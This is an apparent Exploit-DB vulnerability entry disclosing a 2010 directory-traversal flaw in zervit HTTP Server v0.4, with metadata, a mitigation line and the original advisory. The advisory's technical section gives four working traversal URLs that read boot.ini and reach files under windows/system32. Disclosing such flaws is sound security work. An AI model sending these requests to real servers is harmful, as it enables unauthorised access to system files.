zervit Web Server v0.4 Directory Traversals

vendor:

zervit HTTP Server

by:

Dr_IDE

7,5

CVSS

HIGH

Directory Traversal

CWE

Product Name: zervit HTTP Server

Affected Version From: v0.4

Affected Version To: v0.4

Patch Exists: NO

Related CWE: N/A

CPE: a:zervit:zervit_http_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2010

zervit Web Server v0.4 Directory Traversals

zervit HTTP Server v0.4 is a Windows based HTTP server. This is the latest version of the application available. zervit HTTP Server is vulnerable to remote directory traversal attacks. Other traversal bugs have been released for this server but this can be done from a browser, no need for Host headers.

Mitigation:

Ensure that user input is validated and sanitized before being used in file system operations.

Source

Exploit-DB raw data:

###################################################################
#
# zervit Web Server v0.4 Directory Traversals
# Found By:	Dr_IDE
# Date: 	May 12, 2010
# Download:	http://zervit.sourceforge.net/
# Tested on:	Windows 7
#
###################################################################

- Description -

zervit HTTP Server v0.4 is a Windows based HTTP server. This is the latest
version of the application available.

zervit HTTP Server is vulnerable to remote directory traversal attacks. Other traversal bugs
have been released for this server but this can be done from a browser, no need for Host headers.

- Technical Details - (This is with Directory Listing = On or Off)

http://[ webserver IP][:port]index.html?../../../../../boot.ini
http://[ webserver IP][:port]index.html?..\..\..\..\..\boot.ini
http://[ webserver IP][:port]calc.exe?../../../../windows/system32/calc.exe
http://[ webserver IP][:port]calc.exe?..\..\..\..\windows\system32\calc.exe

#[pocoftheday.blogspot.com]